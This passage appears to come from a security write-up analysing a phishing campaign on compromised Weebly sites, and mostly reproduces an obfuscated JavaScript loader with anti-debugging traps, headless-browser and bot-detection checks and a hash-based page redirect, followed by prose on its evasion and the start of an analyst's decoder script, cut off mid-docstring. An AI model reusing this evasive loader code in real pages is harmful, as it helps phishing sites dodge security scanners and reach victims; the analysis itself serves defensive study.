return _0x42c594;
} else {
if (_0x342818) {
var _0x498922 = _0x342818[_0x2b74('\x30\x78\x37\x61', '\x44\x54\x49\x4a')](_0x4fcd89, arguments);
_0x342818 = null;
return _0x498922;
}
}
}
: function() {}
;
_0x45913c = ![];
return _0x3af8fb;
}
;
}();
(function() {
var _0x5e7496 = {
'\x53\x58\x6c\x69\x73': '\x57\x4d\x4a\x54\x4f',
'\x68\x67\x6f\x43\x6a': _0x2b74('\x30\x78\x62\x64', '\x2a\x21\x25\x5d'),
'\x57\x4c\x4c\x41\x51': _0x2b74('\x30\x78\x35\x38', '\x33\x6b\x68\x46'),
'\x52\x4e\x48\x57\x70': function(_0x31c24d, _0x4d5e36) {
return _0x31c24d + _0x4d5e36;
},
'\x6b\x70\x63\x7a\x63': _0x2b74('\x30\x78\x39\x64', '\x52\x77\x38\x4c'),
'\x4a\x77\x77\x5a\x6d': function(_0x848298, _0x294cfe) {
return _0x848298 + _0x294cfe;
},
'\x77\x44\x46\x54\x43': _0x2b74('\x30\x78\x63\x61', '\x64\x44\x6a\x4f'),
'\x48\x6f\x68\x4a\x74': function(_0x44fe71, _0x1b81c9) {
return _0x44fe71(_0x1b81c9);
},
'\x65\x62\x67\x4e\x64': function(_0x56ebf8) {
return _0x56ebf8();
}
};
_0x102c43(this, function() {
if (_0x5e7496['\x53\x58\x6c\x69\x73'] === _0x5e7496[_0x2b74('\x30\x78\x39\x62', '\x31\x4b\x37\x6f')]) {
while (!![]) {}
} else {
var _0x5057c6 = new RegExp(_0x2b74('\x30\x78\x62\x37', '\x31\x4b\x37\x6f'));
var _0x5c77f5 = new RegExp(_0x5e7496[_0x2b74('\x30\x78\x34\x31', '\x41\x68\x6c\x62')],'\x69');
var _0xcd357b = _0x5c5f61(_0x2b74('\x30\x78\x61\x64', '\x32\x43\x65\x4e'));
if (!_0x5057c6[_0x2b74('\x30\x78\x39\x33', '\x49\x26\x38\x4b')](_0x5e7496[_0x2b74('\x30\x78\x37\x65', '\x74\x51\x5b\x55')](_0xcd357b, _0x5e7496[_0x2b74('\x30\x78\x37\x38', '\x44\x54\x49\x4a')])) || !_0x5c77f5['\x74\x65\x73\x74'](_0x5e7496[_0x2b74('\x30\x78\x32\x30', '\x44\x54\x49\x4a')](_0xcd357b, _0x5e7496[_0x2b74('\x30\x78\x39\x36', '\x33\x6b\x68\x46')]))) {
_0x5e7496[_0x2b74('\x30\x78\x33\x64', '\x35\x29\x74\x52')](_0xcd357b, '\x30');
} else {
_0x5e7496[_0x2b74('\x30\x78\x35\x32', '\x67\x38\x67\x67')](_0x5c5f61);
}
}
})();
}());
var _0x39d789 = document[_0x2b74('\x30\x78\x39\x38', '\x42\x46\x4f\x38')];
var _0x188646 = navigator[_0x2b74('\x30\x78\x33\x35', '\x38\x38\x32\x4f')];
botFound = 0x0;
setInterval(function() {
var _0x5b65c6 = {
'\x4f\x65\x64\x77\x53': function(_0x31615a) {
return _0x31615a();
}
};
_0x5b65c6[_0x2b74('\x30\x78\x35\x61', '\x21\x31\x54\x42')](_0x5c5f61);
}, 0xfa0);
stoper = 0x0;
var _0x2a7e2f = new Image();
var _0x19dc3b = ![];
_0x2a7e2f[_0x2b74('\x30\x78\x37\x31', '\x30\x36\x32\x26')] = _0x250c4f;
_0x2a7e2f[_0x2b74('\x30\x78\x33', '\x30\x36\x32\x26')] = _0x47b803;
_0x2a7e2f[_0x2b74('\x30\x78\x35\x31', '\x33\x6b\x68\x46')] = _0x2b74('\x30\x78\x63\x38', '\x33\x6b\x68\x46');
function _0x355530(_0x459959, _0x3f0dc4) {
var _0x3ef37a = {
'\x4f\x78\x76\x4d\x49': function(_0x398952, _0x53d550) {
return _0x398952 * _0x53d550;
},
'\x4d\x6a\x6e\x77\x6e': function(_0x43ad2d, _0x4ae30c) {
return _0x43ad2d > _0x4ae30c;
},
'\x59\x46\x66\x66\x62': function(_0x36a69e, _0x3dd433) {
return _0x36a69e === _0x3dd433;
},
'\x62\x4d\x61\x4d\x41': _0x2b74('\x30\x78\x39', '\x32\x74\x67\x73'),
'\x59\x62\x6b\x65\x76': function(_0x571490, _0x5a2bcb) {
return _0x571490 - _0x5a2bcb;
}
};
for (a = 0x1; a <= _0x459959; a++) {
num = _0x3ef37a[_0x2b74('\x30\x78\x32\x32', '\x64\x44\x6a\x4f')](Math['\x72\x61\x6e\x64\x6f\x6d'](), 0x2710);
}
if (_0x3ef37a[_0x2b74('\x30\x78\x32\x65', '\x6e\x33\x71\x72')](_0x3f0dc4, 0x0)) {
if (_0x3ef37a[_0x2b74('\x30\x78\x38\x39', '\x35\x29\x74\x52')](_0x2b74('\x30\x78\x35\x65', '\x44\x4f\x64\x47'), _0x3ef37a[_0x2b74('\x30\x78\x31\x33', '\x49\x26\x38\x4b')])) {
botFound = 0x1;
} else {
return _0x355530(Math['\x6d\x61\x78'](num, 0x1), _0x3ef37a[_0x2b74('\x30\x78\x31\x38', '\x5e\x72\x43\x28')](_0x3f0dc4, 0x1));
}
} else {
return num;
}
}
function _0x32b36c() {
window[_0x2b74('\x30\x78\x62\x34', '\x5a\x4e\x78\x6f')][_0x2b74('\x30\x78\x62\x31', '\x54\x51\x24\x79')]();
}
function _0x250c4f() {
var _0x292066 = {
'\x58\x51\x73\x55\x51': function(_0xc19948, _0xc5291b) {
return _0xc19948 !== _0xc5291b;
},
'\x58\x6a\x47\x4d\x5a': function(_0x48e0b4, _0x1b4b02) {
return _0x48e0b4 + _0x1b4b02;
},
'\x49\x7a\x67\x4c\x46': function(_0x8fb4ea, _0x32a7f8) {
return _0x8fb4ea / _0x32a7f8;
},
'\x71\x75\x67\x62\x47': _0x2b74('\x30\x78\x61\x34', '\x74\x51\x5b\x55'),
'\x4e\x44\x64\x45\x73': function(_0x3835cb, _0x171d0c) {
return _0x3835cb === _0x171d0c;
},
'\x52\x63\x44\x73\x49': function(_0x1db092, _0x401f2f) {
return _0x1db092 % _0x401f2f;
},
'\x75\x4c\x75\x59\x66': function(_0x2ac878, _0x180197) {
return _0x2ac878 != _0x180197;
},
'\x79\x6f\x6d\x48\x48': _0x2b74('\x30\x78\x36\x31', '\x5e\x72\x43\x28'),
'\x66\x55\x65\x66\x6d': _0x2b74('\x30\x78\x63\x34', '\x48\x59\x58\x62'),
'\x4f\x6d\x6c\x4d\x50': function(_0x252d1f, _0x314af6) {
return _0x252d1f(_0x314af6);
},
'\x6e\x50\x68\x6d\x42': _0x2b74('\x30\x78\x33\x36', '\x31\x4b\x37\x6f'),
'\x47\x5a\x44\x79\x67': _0x2b74('\x30\x78\x38\x32', '\x41\x68\x6c\x62'),
'\x52\x4e\x48\x47\x4e': function(_0x162fb8, _0x542a7a) {
return _0x162fb8 + _0x542a7a;
},
'\x4f\x48\x6b\x5a\x54': _0x2b74('\x30\x78\x63\x30', '\x48\x59\x58\x62'),
'\x6e\x78\x74\x4d\x6c': function(_0x53a7d7, _0x4e5e3e) {
return _0x53a7d7(_0x4e5e3e);
},
'\x4d\x55\x76\x74\x4b': function(_0x56a74c) {
return _0x56a74c();
},
'\x61\x6d\x64\x71\x41': function(_0x149717, _0x2541ca, _0x353ecc) {
return _0x149717(_0x2541ca, _0x353ecc);
},
'\x4d\x7a\x64\x4a\x42': _0x2b74('\x30\x78\x37\x32', '\x65\x29\x33\x51'),
'\x67\x6d\x6c\x4d\x70': _0x2b74('\x30\x78\x38\x65', '\x6e\x33\x71\x72'),
'\x74\x50\x4d\x42\x6c': function(_0x53722e) {
return _0x53722e();
},
'\x51\x6e\x4b\x45\x51': function(_0x26b2f4) {
return _0x26b2f4();
},
'\x67\x4f\x42\x4f\x51': '\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x2a\x5c\x28\x20\x2a\x5c\x29',
'\x55\x46\x45\x6f\x51': function(_0x320cbd, _0x1fb761) {
return _0x320cbd + _0x1fb761;
},
'\x45\x43\x56\x43\x78': '\x69\x7a\x57\x66\x61',
'\x52\x66\x57\x6e\x6f': function(_0xc37d3d, _0x398111) {
return _0xc37d3d * _0x398111;
},
'\x44\x48\x56\x48\x57': function(_0x54d57f, _0x80d020) {
return _0x54d57f * _0x80d020;
},
'\x63\x76\x68\x67\x51': function(_0x257511, _0xca1982) {
return _0x257511 < _0xca1982;
},
'\x6c\x56\x68\x4f\x66': _0x2b74('\x30\x78\x64\x34', '\x42\x46\x4f\x38'),
'\x53\x58\x48\x4d\x76': _0x2b74('\x30\x78\x38\x36', '\x41\x68\x6c\x62'),
'\x77\x75\x7a\x4b\x6f': function(_0x6e3576, _0x3e32fe) {
return _0x6e3576 === _0x3e32fe;
},
'\x54\x67\x42\x4c\x74': _0x2b74('\x30\x78\x62\x62', '\x6e\x33\x71\x72'),
'\x61\x43\x57\x4a\x44': _0x2b74('\x30\x78\x36\x65', '\x28\x39\x4a\x54'),
'\x52\x48\x48\x57\x6b': function(_0x11de68, _0x5615ae) {
return _0x11de68 === _0x5615ae;
},
'\x76\x55\x4f\x6c\x4c': function(_0x5098c4, _0x174e2e) {
return _0x5098c4 === _0x174e2e;
},
'\x4e\x4f\x63\x59\x61': function(_0x401644, _0x2e7ca9) {
return _0x401644 === _0x2e7ca9;
},
'\x67\x42\x73\x77\x4e': '\x55\x59\x4c\x76\x52',
'\x4c\x73\x52\x56\x4d': _0x2b74('\x30\x78\x62\x66', '\x48\x59\x58\x62'),
'\x4c\x54\x7a\x45\x4b': function(_0x157ceb, _0x308ee5) {
return _0x157ceb == _0x308ee5;
},
'\x6a\x77\x4d\x4f\x66': function(_0x58247b, _0x36d56) {
return _0x58247b !== _0x36d56;
},
'\x77\x6e\x51\x57\x6e': _0x2b74('\x30\x78\x33\x34', '\x71\x36\x59\x5b'),
'\x70\x41\x4c\x4c\x61': function(_0x5c2048, _0x30c7d1) {
return _0x5c2048 != _0x30c7d1;
},
'\x7a\x6f\x65\x69\x48': _0x2b74('\x30\x78\x36\x62', '\x57\x2a\x58\x26'),
'\x72\x7a\x69\x6f\x4e': function(_0x22e57a, _0x290864) {
return _0x22e57a === _0x290864;
},
'\x73\x55\x4a\x43\x52': function(_0x1df977, _0x5584bb) {
return _0x1df977 + _0x5584bb;
},
'\x63\x46\x74\x65\x67': _0x2b74('\x30\x78\x34\x37', '\x35\x29\x74\x52'),
'\x61\x45\x67\x54\x50': _0x2b74('\x30\x78\x39\x30', '\x37\x77\x69\x66'),
'\x56\x61\x7a\x58\x4c': '\x77\x69\x6e\x64\x6f\x77\x2e\x68\x69\x73\x74\x6f\x72\x79\x2e\x66\x6f\x72\x77\x61\x72\x64\x28\x29\x3b'
};
num = _0x292066[_0x2b74('\x30\x78\x33\x39', '\x67\x6b\x63\x4e')](_0x355530, 0x1, _0x292066[_0x2b74('\x30\x78\x33\x32', '\x32\x43\x65\x4e')](_0x292066[_0x2b74('\x30\x78\x37\x34', '\x55\x41\x35\x25')](0x2, 0x4), 0x6) * 0x9);
if (_0x292066[_0x2b74('\x30\x78\x36\x63', '\x24\x29\x53\x73')](num, 0x1)) {
if (_0x2b74('\x30\x78\x38\x31', '\x33\x6b\x68\x46') === _0x292066['\x6c\x56\x68\x4f\x66']) {
_0x19dc3b = !![];
} else {
var _0x56a05e = fn[_0x2b74('\x30\x78\x35\x64', '\x51\x5d\x75\x40')](context, arguments);
fn = null;
return _0x56a05e;
}
} else {
if (_0x292066['\x4e\x44\x64\x45\x73'](_0x2b74('\x30\x78\x31\x66', '\x4a\x71\x4c\x64'), _0x292066[_0x2b74('\x30\x78\x63\x32', '\x38\x38\x32\x4f')])) {
window[_0x2b74('\x30\x78\x63\x66', '\x32\x74\x67\x73')][_0x2b74('\x30\x78\x64\x33', '\x48\x59\x58\x62')]();
} else {
_0x19dc3b = ![];
}
}
if (_0x292066[_0x2b74('\x30\x78\x35\x62', '\x58\x73\x52\x4c')](_0x19dc3b, !![])) {
if (_0x292066[_0x2b74('\x30\x78\x39\x31', '\x55\x41\x35\x25')](_0x2b74('\x30\x78\x62\x65', '\x6e\x75\x61\x7a'), _0x292066[_0x2b74('\x30\x78\x31\x34', '\x41\x68\x6c\x62')])) {
if (_0x292066[_0x2b74('\x30\x78\x33\x38', '\x2a\x21\x25\x5d')](_0x292066['\x58\x6a\x47\x4d\x5a']('', _0x292066[_0x2b74('\x30\x78\x35\x33', '\x63\x67\x6e\x25')](counter, counter))[_0x292066[_0x2b74('\x30\x78\x31\x61', '\x52\x74\x36\x77')]], 0x1) || _0x292066['\x4e\x44\x64\x45\x73'](_0x292066[_0x2b74('\x30\x78\x62\x61', '\x63\x67\x6e\x25')](counter, 0x14), 0x0)) {
debugger ;
} else {
debugger ;
}
} else {
stoper = 0x1;
}
}
if (/HeadlessChrome/[_0x2b74('\x30\x78\x37\x39', '\x5e\x72\x43\x28')](window[_0x2b74('\x30\x78\x62\x36', '\x67\x38\x67\x67')]['\x75\x73\x65\x72\x41\x67\x65\x6e\x74'])) {
if (_0x292066['\x58\x51\x73\x55\x51'](_0x292066['\x61\x43\x57\x4a\x44'], _0x292066[_0x2b74('\x30\x78\x37\x33', '\x6e\x33\x71\x72')])) {
if (!Function[_0x2b74('\x30\x78\x61\x39', '\x75\x68\x29\x44')][_0x2b74('\x30\x78\x34\x61', '\x4a\x71\x4c\x64')]) {
botFound = 0x1;
return;
}
if (_0x292066['\x75\x4c\x75\x59\x66'](Function[_0x2b74('\x30\x78\x34\x38', '\x24\x29\x53\x73')][_0x2b74('\x30\x78\x61\x36', '\x21\x63\x46\x41')][_0x2b74('\x30\x78\x34\x33', '\x21\x63\x46\x41')]()[_0x2b74('\x30\x78\x39\x39', '\x44\x4f\x64\x47')](/bind/g, _0x292066['\x79\x6f\x6d\x48\x48']), Error[_0x2b74('\x30\x78\x62\x38', '\x51\x5d\x75\x40')]())) {
botFound = 0x1;
return;
}
if (Function[_0x2b74('\x30\x78\x30', '\x44\x54\x49\x4a')][_0x2b74('\x30\x78\x37\x36', '\x57\x2a\x58\x26')][_0x2b74('\x30\x78\x61\x33', '\x74\x51\x5b\x55')]()[_0x2b74('\x30\x78\x35\x30', '\x45\x58\x37\x54')](/toString/g, _0x292066[_0x2b74('\x30\x78\x64\x38', '\x75\x68\x29\x44')]) != Error[_0x2b74('\x30\x78\x37\x35', '\x5e\x72\x43\x28')]()) {
botFound = 0x1;
return;
}
} else {
botFound = 0x1;
}
}
if (navigator[_0x2b74('\x30\x78\x34\x36', '\x37\x77\x69\x66')]) {
if (_0x292066[_0x2b74('\x30\x78\x35\x63', '\x28\x57\x4c\x32')](_0x2b74('\x30\x78\x31\x37', '\x4e\x6a\x24\x6d'), _0x2b74('\x30\x78\x32', '\x48\x59\x58\x62'))) {
_0x292066['\x61\x6d\x64\x71\x41'](_0x102c43, this, function() {
var _0x3bfdd2 = new RegExp('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x2a\x5c\x28\x20\x2a\x5c\x29');
var _0xda1de4 = new RegExp(_0x292066[_0x2b74('\x30\x78\x31', '\x5a\x4e\x78\x6f')],'\x69');
var _0x3aa548 = _0x292066[_0x2b74('\x30\x78\x31\x35', '\x54\x51\x24\x79')](_0x5c5f61, _0x292066[_0x2b74('\x30\x78\x32\x35', '\x57\x2a\x58\x26')]);
if (!_0x3bfdd2[_0x2b74('\x30\x78\x63\x37', '\x45\x58\x37\x54')](_0x292066[_0x2b74('\x30\x78\x34\x39', '\x45\x35\x56\x7a')](_0x3aa548, _0x292066[_0x2b74('\x30\x78\x36\x33', '\x38\x38\x32\x4f')])) || !_0xda1de4[_0x2b74('\x30\x78\x39\x37', '\x5a\x4e\x78\x6f')](_0x292066['\x52\x4e\x48\x47\x4e'](_0x3aa548, _0x292066[_0x2b74('\x30\x78\x33\x65', '\x44\x4f\x64\x47')]))) {
_0x292066[_0x2b74('\x30\x78\x32\x36', '\x30\x36\x32\x26')](_0x3aa548, '\x30');
} else {
_0x292066['\x4d\x55\x76\x74\x4b'](_0x5c5f61);
}
})();
} else {
botFound = 0x1;
}
}
if (_0x292066[_0x2b74('\x30\x78\x38\x63', '\x42\x46\x4f\x38')](navigator[_0x2b74('\x30\x78\x61\x32', '\x38\x38\x32\x4f')], '')) {
botFound = 0x1;
}
if (window['\x63\x61\x6c\x6c\x50\x68\x61\x6e\x74\x6f\x6d'] || window[_0x2b74('\x30\x78\x32\x61', '\x5e\x72\x43\x28')]) {
if (_0x292066['\x4e\x4f\x63\x59\x61'](_0x292066[_0x2b74('\x30\x78\x65', '\x76\x45\x5b\x54')], _0x2b74('\x30\x78\x36\x61', '\x74\x51\x5b\x55'))) {
var _0x73dfb1 = function() {
var _0x554545 = _0x73dfb1[_0x2b74('\x30\x78\x64', '\x64\x44\x6a\x4f')](_0x292066[_0x2b74('\x30\x78\x38\x35', '\x4e\x6a\x24\x6d')])()[_0x2b74('\x30\x78\x32\x34', '\x32\x74\x67\x73')](_0x292066[_0x2b74('\x30\x78\x34\x63', '\x21\x31\x54\x42')]);
return !_0x554545[_0x2b74('\x30\x78\x38\x62', '\x4a\x71\x4c\x64')](_0x3b6a81);
};
return _0x292066[_0x2b74('\x30\x78\x32\x31', '\x28\x39\x4a\x54')](_0x73dfb1);
} else {
botFound = 0x1;
}
}
(function() {
if (!Function[_0x2b74('\x30\x78\x32\x63', '\x6e\x33\x71\x72')][_0x2b74('\x30\x78\x38\x33', '\x54\x51\x24\x79')]) {
botFound = 0x1;
return;
}
if (_0x292066['\x75\x4c\x75\x59\x66'](Function[_0x2b74('\x30\x78\x38', '\x6e\x75\x61\x7a')][_0x2b74('\x30\x78\x35\x36', '\x74\x51\x5b\x55')][_0x2b74('\x30\x78\x36\x39', '\x6e\x33\x71\x72')]()[_0x2b74('\x30\x78\x36\x66', '\x76\x45\x5b\x54')](/bind/g, _0x292066[_0x2b74('\x30\x78\x64\x30', '\x64\x44\x6a\x4f')]), Error[_0x2b74('\x30\x78\x32\x62', '\x33\x6b\x68\x46')]())) {
botFound = 0x1;
return;
}
if (_0x292066[_0x2b74('\x30\x78\x36\x36', '\x35\x29\x74\x52')](Function[_0x2b74('\x30\x78\x36\x30', '\x38\x38\x32\x4f')]['\x74\x6f\x53\x74\x72\x69\x6e\x67'][_0x2b74('\x30\x78\x61\x33', '\x74\x51\x5b\x55')]()[_0x2b74('\x30\x78\x36\x34', '\x57\x2a\x58\x26')](/toString/g, _0x292066['\x79\x6f\x6d\x48\x48']), Error[_0x2b74('\x30\x78\x64\x31', '\x32\x74\x67\x73')]())) {
botFound = 0x1;
return;
}
}());
if (window[_0x2b74('\x30\x78\x63', '\x21\x63\x46\x41')][_0x2b74('\x30\x78\x38\x37', '\x28\x57\x4c\x32')]['\x67\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65'](_0x2b74('\x30\x78\x33\x66', '\x62\x76\x54\x46'))) {
if (_0x292066[_0x2b74('\x30\x78\x31\x63', '\x37\x77\x69\x66')] === _0x2b74('\x30\x78\x66', '\x32\x74\x67\x73')) {
botFound = 0x1;
} else {
var _0x57a6c7 = function() {
while (!![]) {}
};
return _0x292066[_0x2b74('\x30\x78\x36\x32', '\x54\x58\x57\x4d')](_0x57a6c7);
}
}
if (_0x292066[_0x2b74('\x30\x78\x61\x66', '\x44\x54\x49\x4a')](navigator[_0x2b74('\x30\x78\x35\x66', '\x65\x29\x33\x51')], !![])) {
if (_0x292066[_0x2b74('\x30\x78\x62\x30', '\x28\x39\x4a\x54')](_0x292066[_0x2b74('\x30\x78\x37\x37', '\x75\x68\x29\x44')], _0x292066[_0x2b74('\x30\x78\x34\x62', '\x31\x4b\x37\x6f')])) {
var _0x3a2240 = firstCall ? function() {
if (fn) {
var _0x398ec5 = fn[_0x2b74('\x30\x78\x63\x64', '\x44\x4f\x64\x47')](context, arguments);
fn = null;
return _0x398ec5;
}
}
: function() {}
;
firstCall = ![];
return _0x3a2240;
} else {
botFound = 0x1;
}
}
if (window[_0x2b74('\x30\x78\x34\x64', '\x6e\x33\x71\x72')] || window[_0x2b74('\x30\x78\x36\x38', '\x54\x51\x24\x79')]) {
if ('\x51\x69\x52\x56\x4c' === _0x2b74('\x30\x78\x63\x39', '\x71\x36\x59\x5b')) {
botFound = 0x1;
} else {
var _0x354d13 = new RegExp(_0x292066['\x67\x4f\x42\x4f\x51']);
var _0x3892a4 = new RegExp(_0x292066['\x66\x55\x65\x66\x6d'],'\x69');
var _0x40dc95 = _0x5c5f61(_0x292066[_0x2b74('\x30\x78\x37', '\x24\x29\x53\x73')]);
if (!_0x354d13[_0x2b74('\x30\x78\x37\x39', '\x5e\x72\x43\x28')](_0x292066[_0x2b74('\x30\x78\x38\x61', '\x45\x58\x37\x54')](_0x40dc95, _0x292066[_0x2b74('\x30\x78\x37\x62', '\x32\x43\x65\x4e')])) || !_0x3892a4[_0x2b74('\x30\x78\x61\x65', '\x21\x31\x54\x42')](_0x40dc95 + _0x292066['\x4f\x48\x6b\x5a\x54'])) {
_0x292066[_0x2b74('\x30\x78\x32\x39', '\x75\x68\x29\x44')](_0x40dc95, '\x30');
} else {
_0x292066['\x51\x6e\x4b\x45\x51'](_0x5c5f61);
}
}
}
if (_0x292066[_0x2b74('\x30\x78\x63\x35', '\x45\x35\x56\x7a')](window[_0x2b74('\x30\x78\x61\x37', '\x32\x43\x65\x4e')], 0x1) && _0x292066['\x4e\x4f\x63\x59\x61'](window['\x62\x6f\x74\x46\x6f\x75\x6e\x64'], 0x0)) {
if (_0x292066[_0x2b74('\x30\x78\x32\x37', '\x67\x38\x67\x67')](_0x292066['\x7a\x6f\x65\x69\x48'], _0x292066[_0x2b74('\x30\x78\x61', '\x4e\x6a\x24\x6d')])) {
var _0x2e75d6 = window[_0x2b74('\x30\x78\x31\x30', '\x43\x73\x40\x25')][_0x2b74('\x30\x78\x63\x63', '\x74\x51\x5b\x55')]['\x73\x6c\x69\x63\x65'](0x1);
if (_0x292066[_0x2b74('\x30\x78\x34\x35', '\x76\x45\x5b\x54')](_0x2e75d6, '')) {
_0x2e75d6 = window[_0x2b74('\x30\x78\x35\x39', '\x76\x45\x5b\x54')][_0x2b74('\x30\x78\x36', '\x55\x41\x35\x25')][_0x2b74('\x30\x78\x39\x34', '\x52\x74\x36\x77')](_0x292066[_0x2b74('\x30\x78\x64\x36', '\x2a\x21\x25\x5d')](window[_0x2b74('\x30\x78\x62\x35', '\x6e\x33\x71\x72')][_0x2b74('\x30\x78\x33\x61', '\x44\x4f\x64\x47')][_0x2b74('\x30\x78\x39\x66', '\x5e\x72\x43\x28')]('\x23'), 0x1));
}
var _0x58061a = _0x292066['\x63\x46\x74\x65\x67'];
document[_0x2b74('\x30\x78\x38\x34', '\x49\x26\x38\x4b')][_0x2b74('\x30\x78\x34\x30', '\x5a\x4e\x78\x6f')] = _0x292066[_0x2b74('\x30\x78\x39\x35', '\x21\x31\x54\x42')](_0x58061a, _0x292066[_0x2b74('\x30\x78\x34\x34', '\x51\x5d\x75\x40')]) + _0x2e75d6;
_0x292066[_0x2b74('\x30\x78\x39\x61', '\x49\x26\x38\x4b')](setTimeout, _0x292066[_0x2b74('\x30\x78\x64\x32', '\x76\x4c\x37\x59')], 0x0);
window[_0x2b74('\x30\x78\x36\x37', '\x45\x35\x56\x7a')] = function() {
var _0x13d432 = {
'\x57\x6e\x6a\x61\x73': function(_0x4f5ed5) {
return _0x292066[_0x2b74('\x30\x78\x61\x62', '\x36\x50\x5a\x47')](_0x4f5ed5);
}
};
if (_0x292066['\x45\x43\x56\x43\x78'] !== _0x2b74('\x30\x78\x35\x34', '\x64\x44\x6a\x4f')) {
null;
} else {
_0x13d432[_0x2b74('\x30\x78\x31\x62', '\x2a\x21\x25\x5d')](_0x5c5f61);
}
}
;
} else {
botFound = 0x1;
}
}
}
function _0x47b803() {}
function _0x5c5f61(_0x3d4ef9) {
var _0x958405 = {
'\x4c\x58\x45\x56\x79': _0x2b74('\x30\x78\x35\x35', '\x32\x43\x65\x4e'),
'\x76\x77\x53\x4c\x69': function(_0x1b126c, _0x2283f8) {
return _0x1b126c * _0x2283f8;
},
'\x44\x4c\x49\x73\x49': function(_0xa896f2, _0x3dcba0) {
return _0xa896f2 > _0x3dcba0;
},
'\x64\x79\x46\x4f\x6e': function(_0x550534, _0x4c8cc3, _0x29892e) {
return _0x550534(_0x4c8cc3, _0x29892e);
},
'\x66\x43\x72\x6f\x44': function(_0x169c35, _0x10cca4) {
return _0x169c35 - _0x10cca4;
},
'\x57\x58\x70\x49\x63': _0x2b74('\x30\x78\x33\x37', '\x52\x74\x36\x77'),
'\x45\x4f\x4a\x75\x77': function(_0x53c43a, _0x130863) {
return _0x53c43a === _0x130863;
},
'\x43\x74\x49\x7a\x4a': '\x44\x4b\x57\x67\x51',
'\x58\x75\x54\x41\x51': function(_0x37f3f3) {
return _0x37f3f3();
},
'\x70\x79\x77\x47\x46': function(_0x7a6ea6, _0xfb52a9) {
return _0x7a6ea6 === _0xfb52a9;
},
'\x76\x72\x75\x45\x71': _0x2b74('\x30\x78\x37\x66', '\x5e\x50\x4b\x49'),
'\x73\x51\x53\x73\x41': _0x2b74('\x30\x78\x33\x33', '\x30\x36\x32\x26'),
'\x61\x4e\x4c\x55\x4b': function(_0x5d6cd1, _0x193cae) {
return _0x5d6cd1 !== _0x193cae;
},
'\x79\x67\x78\x45\x4e': function(_0x156d2b, _0xc9c318) {
return _0x156d2b / _0xc9c318;
},
'\x42\x59\x77\x55\x6a': _0x2b74('\x30\x78\x61\x31', '\x2a\x21\x25\x5d'),
'\x4e\x78\x4c\x4f\x46': _0x2b74('\x30\x78\x38\x38', '\x2a\x21\x25\x5d'),
'\x4a\x6b\x79\x77\x78': function(_0x164679, _0x559fd2) {
return _0x164679(_0x559fd2);
},
'\x55\x76\x53\x45\x43': _0x2b74('\x30\x78\x38\x30', '\x6e\x33\x71\x72'),
'\x76\x56\x41\x77\x41': function(_0x1d5f32, _0x1d6c90) {
return _0x1d5f32(_0x1d6c90);
}
};
function _0x483faa(_0x1eabd1) {
var _0x4404d8 = {
'\x54\x6d\x78\x41\x76': function(_0x16ba48, _0x21289c) {
return _0x16ba48(_0x21289c);
}
};
if (typeof _0x1eabd1 === _0x958405['\x57\x58\x70\x49\x63']) {
if (_0x958405[_0x2b74('\x30\x78\x32\x64', '\x4e\x6a\x24\x6d')](_0x958405['\x43\x74\x49\x7a\x4a'], _0x2b74('\x30\x78\x32\x66', '\x33\x6b\x68\x46'))) {
_0x4404d8[_0x2b74('\x30\x78\x61\x63', '\x48\x59\x58\x62')](result, '\x30');
} else {
var _0x2d4448 = function() {
if (_0x958405[_0x2b74('\x30\x78\x62\x39', '\x21\x63\x46\x41')] !== _0x958405['\x4c\x58\x45\x56\x79']) {
botFound = 0x1;
} else {
while (!![]) {}
}
};
return _0x958405['\x58\x75\x54\x41\x51'](_0x2d4448);
}
} else {
if (_0x958405[_0x2b74('\x30\x78\x35', '\x54\x51\x24\x79')](_0x958405[_0x2b74('\x30\x78\x61\x30', '\x36\x50\x5a\x47')], _0x958405[_0x2b74('\x30\x78\x34\x65', '\x64\x44\x6a\x4f')])) {
for (a = 0x1; a <= iterations; a++) {
num = _0x958405[_0x2b74('\x30\x78\x36\x64', '\x30\x36\x32\x26')](Math[_0x2b74('\x30\x78\x38\x66', '\x63\x67\x6e\x25')](), 0x2710);
}
if (_0x958405[_0x2b74('\x30\x78\x36\x35', '\x71\x36\x59\x5b')](depth, 0x0)) {
return _0x958405['\x64\x79\x46\x4f\x6e'](_0x355530, Math[_0x2b74('\x30\x78\x33\x62', '\x28\x39\x4a\x54')](num, 0x1), _0x958405[_0x2b74('\x30\x78\x61\x61', '\x49\x26\x38\x4b')](depth, 0x1));
} else {
return num;
}
} else {
if (_0x958405['\x61\x4e\x4c\x55\x4b'](('' + _0x958405['\x79\x67\x78\x45\x4e'](_0x1eabd1, _0x1eabd1))[_0x958405[_0x2b74('\x30\x78\x64\x35', '\x42\x46\x4f\x38')]], 0x1) || _0x958405[_0x2b74('\x30\x78\x34\x32', '\x31\x4b\x37\x6f')](_0x1eabd1 % 0x14, 0x0)) {
if (_0x958405[_0x2b74('\x30\x78\x39\x63', '\x65\x29\x33\x51')](_0x958405[_0x2b74('\x30\x78\x63\x36', '\x52\x74\x36\x77')], _0x958405[_0x2b74('\x30\x78\x34\x66', '\x76\x45\x5b\x54')])) {
return num;
} else {
debugger ;
}
} else {
debugger ;
}
}
}
_0x958405['\x4a\x6b\x79\x77\x78'](_0x483faa, ++_0x1eabd1);
}
try {
if (_0x3d4ef9) {
if (_0x958405['\x55\x76\x53\x45\x43'] === _0x958405[_0x2b74('\x30\x78\x37\x63', '\x51\x5d\x75\x40')]) {
return _0x483faa;
} else {
botFound = 0x1;
}
} else {
_0x958405['\x76\x56\x41\x77\x41'](_0x483faa, 0x0);
}
} catch (_0x1611d5) {}
}
}
</script>
</head>
<body></body>
</html>

Because of these JavaScript evasion techniques (obfuscation plus the anti-debugging and bot-detection checks above), these malicious URLs are not detected by any security vendors. They all follow the same URL pattern, */uploads/1/3/*, and all of the malicious websites are hosted on Weebly (a website and eCommerce service). The attackers possibly compromised websites hosted on Weebly and dropped the malicious HTML and PDF documents into the uploads directory.
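To make the sample above easier to analyse, here is an analyst's re-implementation of its string decoder (the routine that base64-decodes an array entry, UTF-8-decodes it and then runs RC4 with the per-call key, looked up through a rotated string array). This is added example code for this write-up, not part of the sample or of SonicWall's tooling; the array, the keys and the rotation count below are constructed for the demonstration. By my reading of the sample's bootstrap, the rotation only runs when a `toString()` self-check on one of its own functions passes, so a beautified copy of the script can rotate differently from the original; recover the real rotation count from the unmodified file before applying this.

```python
"""Analyst re-implementation of the string decoder used by the obfuscated
loader above (javascript-obfuscator style: a rotated string array whose
entries are base64-wrapped RC4 ciphertext, decrypted per call site with a
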